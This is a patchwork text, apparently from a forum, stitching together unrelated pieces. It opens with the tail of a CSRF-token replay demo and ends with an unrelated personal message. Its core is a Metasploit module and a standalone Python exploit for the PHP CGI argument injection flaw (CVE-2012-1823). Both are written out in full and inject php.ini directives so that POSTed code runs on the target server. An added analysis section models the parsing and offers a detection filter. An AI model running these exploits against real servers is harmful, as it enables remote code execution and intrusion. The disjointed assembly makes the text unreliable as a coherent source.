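def session_token(secret, session_id, action):
    """Synchronizer token bound to the session identifier (the OWASP pattern the advisory cites).
    A new session after logout/login yields a new token, so a captured one dies with the session."""
    msg = ("%s|%s" % (session_id, action)).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def verify_session_token(secret, session_id, action, token):
    return hmac.compare_digest(session_token(secret, session_id, action), token)


def replay_demo(secret=b"constructed-site-secret"):
    """Scenario: the attacker captures the admin's create-user token; the admin later logs out
    and back in (new session). Which token still validates?"""
    t0 = 23149 * NONCE_LIFE                                   # constructed timestamp at a bucket start
    old_session, new_session = "sess-before-logout", "sess-after-login"   # constructed session ids
    action, admin = "create-user", 1

    captured_weak = weak_nonce(secret, admin, action, t0)
    captured_bound = session_token(secret, old_session, action)
    later = t0 + 11 * 3600

    return {
        # weak token: still accepted 11 hours later although the session it came from is gone
        "weak_after_relogin": verify_weak(secret, admin, action, later, captured_weak),
        # weak token: only the clock kills it
        "weak_after_window": verify_weak(secret, admin, action, t0 + NONCE_LIFE, captured_weak),
        # session-bound token: rejected as soon as the session changes
        "bound_after_relogin": verify_session_token(secret, new_session, action, captured_bound),
        # and still accepted for a genuine request from the live session it belongs to
        "bound_same_session": verify_session_token(secret, old_session, action, captured_bound),
    }


if __name__ == "__main__":
    for name, ok in replay_demo().items():
        print("%-20s %s" % (name, "accepted" if ok else "rejected"))
```

The session binding does not help against an attacker who can both read the token and ride the live session, but it closes the window the advisory describes: the token is no longer a 12-hour bearer credential that survives logout.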
-
[h=1]PHP CGI Argument Injection[/h]

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP CGI Argument Injection',
      'Description'    => %q{
          When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
          an argument injection vulnerability. This module takes advantage of
          the -d flag to set php.ini directives to achieve code execution.
          From the advisory: "if there is NO unescaped '=' in the query string,
          the string is split on '+' (encoded space) characters, urldecoded,
          passed to a function that escapes shell metacharacters (the "encoded
          in a system-defined manner" from the RFC) and then passes them to the
          CGI binary."
      },
      'Author'         => [ 'egypt', 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ "CVE" , "2012-1823" ],
          [ "URL" , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
        },
      'DisclosureDate' => 'May 03 2012',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
    ], self.class)
  end

  # php-cgi -h
  # ...
  # -s  Display colour syntax highlighted source.
  def check
    uri = target_uri.path
    uri.gsub!(/\?.*/, "")

    print_status("Checking uri #{uri}")

    # A page that already renders highlighted source without "-s" would give a false positive
    response = send_request_raw({ 'uri' => uri })
    if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
      print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
      return Exploit::CheckCode::Unknown
    end

    # "?-s" reaches php-cgi as the -s option and dumps the script's highlighted source
    response = send_request_raw({ 'uri' => uri + '?-s'})
    if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
      return Exploit::CheckCode::Vulnerable
    end

    print_error("Server responded indicating it was not vulnerable")
    return Exploit::CheckCode::Safe
  end

  def exploit
    begin
      # "=" is sent as %3d so the query string contains no unescaped "=" and is split into argv
      args = [
        "-d+allow_url_include%3d#{rand_php_ini_true}",
        "-d+safe_mode%3d#{rand_php_ini_false}",
        "-d+suhosin.simulation%3d#{rand_php_ini_true}",
        "-d+disable_functions%3d%22%22",
        "-d+open_basedir%3dnone",
        "-d+auto_prepend_file%3dphp://input",
        "-n"
      ]
      qs = args.join("+")
      uri = "#{target_uri}?#{qs}"

      # Has to be all on one line, so gsub out the comments and the newlines
      payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
      response = send_request_cgi( {
        'method' => "POST",
        'global' => true,
        'uri'    => uri,
        'data'   => payload_oneline,
      }, 0.5)

      handler
    rescue ::Interrupt
      raise $!
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
      print_error("The target service unreachable")
    rescue ::OpenSSL::SSL::SSLError
      print_error("The target failed to negotiate SSL, is this really an SSL service?")
    end
  end

  def rand_php_ini_false
    Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])
  end

  def rand_php_ini_true
    Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])
  end

end

[h=1]PHP CGI Argument Injection Exploit[/h]

######################################################################################
# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
# (listing ported from the original Python 2 to Python 3; behaviour unchanged)
######################################################################################

import socket
import sys


def cgi_exploit():
    # auto_prepend_file=php://input makes php-cgi execute the POST body before the target script
    pwn_code = """<?php phpinfo();?>"""
    post_Length = len(pwn_code)

    http_raw = """POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" % (HOST, post_Length, pwn_code)

    print(http_raw)

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((HOST, int(PORT)))
        sock.send(http_raw.encode())
        data = sock.recv(10000)
        print(repr(data))
        sock.close()
    except socket.error as msg:
        sys.stderr.write("[ERROR] %s\n" % msg)
        sys.exit(1)


if __name__ == '__main__':
    try:
        HOST = sys.argv[1]
        PORT = sys.argv[2]
        cgi_exploit()
    except IndexError:
        print('[+]Usage: cgi_test.py site.com 80')
        sys.exit(-1)

Sources:
- PHP CGI Argument Injection
- PHP CGI Argument Injection Exploit
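Added example, not from either listing above: a Python model of the query-string rule quoted in the module description (no unescaped "=" in the query string, so it is split on "+", URL-decoded and passed to the CGI binary as argv). It shows how the query strings used by both exploits turn into php-cgi options, collapses the `-d` pairs into the php.ini overrides they would set, and adds a request-side check that flags such queries. The shell-metacharacter escaping step the advisory mentions is left out because it does not change the argument boundaries, and `detect_argument_injection` is my own suggestion for a front-end filter, not the fix PHP shipped.

```python
from urllib.parse import unquote


def cgi_argv_from_query(query_string):
    """Reproduce the RFC 3875 'indexed query' behaviour quoted above: if the query string
    contains no unescaped '=', split it on '+', URL-decode each piece and hand the pieces
    to the CGI program as command-line arguments. With an '=' present nothing is passed
    on the command line; the script only sees QUERY_STRING."""
    if query_string == "" or "=" in query_string:
        return []
    return [unquote(part) for part in query_string.split("+") if part != ""]


def detect_argument_injection(query_string):
    """Front-end check (my suggestion, not PHP's fix): return the argv entries that would
    reach php-cgi as options, i.e. decoded arguments starting with '-'."""
    return [arg for arg in cgi_argv_from_query(query_string) if arg.startswith("-")]


def php_ini_overrides(argv):
    """Collapse '-d key=value' and '-dkey=value' pairs into the php.ini directives they set."""
    overrides = {}
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "-d" and i + 1 < len(argv):
            directive, i = argv[i + 1], i + 2
        elif arg.startswith("-d") and len(arg) > 2:
            directive, i = arg[2:], i + 1
        else:
            i += 1
            continue
        key, _, value = directive.partition("=")
        overrides[key] = value
    return overrides


if __name__ == "__main__":
    # Query strings as sent by the two listings above (Metasploit's with random-case values
    # replaced by fixed ones) and an ordinary application query for comparison.
    samples = [
        "-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-n",
        "-dallow_url_include%3don+-dauto_prepend_file%3dphp://input",
        "-s",
        "id=1",
    ]
    for qs in samples:
        argv = cgi_argv_from_query(qs)
        print(qs)
        print("  argv:", argv)
        print("  ini overrides:", php_ini_overrides(argv))
        print("  flagged:", detect_argument_injection(qs))
```

Two details worth noticing in the output: a "-" that is itself percent-encoded (`%2ds`) still decodes to the `-s` option, so a filter has to run on the decoded arguments rather than the raw query string, and a query containing any literal "=" (such as `page=home+-s`) never reaches argv at all, which is why the exploits encode "=" as `%3d`.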
-
Are you in Bucharest? Shall we go for a drink?